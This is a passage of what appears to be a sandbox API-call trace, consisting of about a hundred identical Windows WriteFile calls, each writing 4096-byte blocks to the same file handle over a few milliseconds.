lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.169] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.173] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.174] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.174] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.174] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.174] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.174] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.175] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.176] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.177] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.178] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.178] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.178] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.178] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.179] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.180] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.181] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.181] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.181] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.181] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.181] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.182] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.184] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.185] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.185] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.186] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: 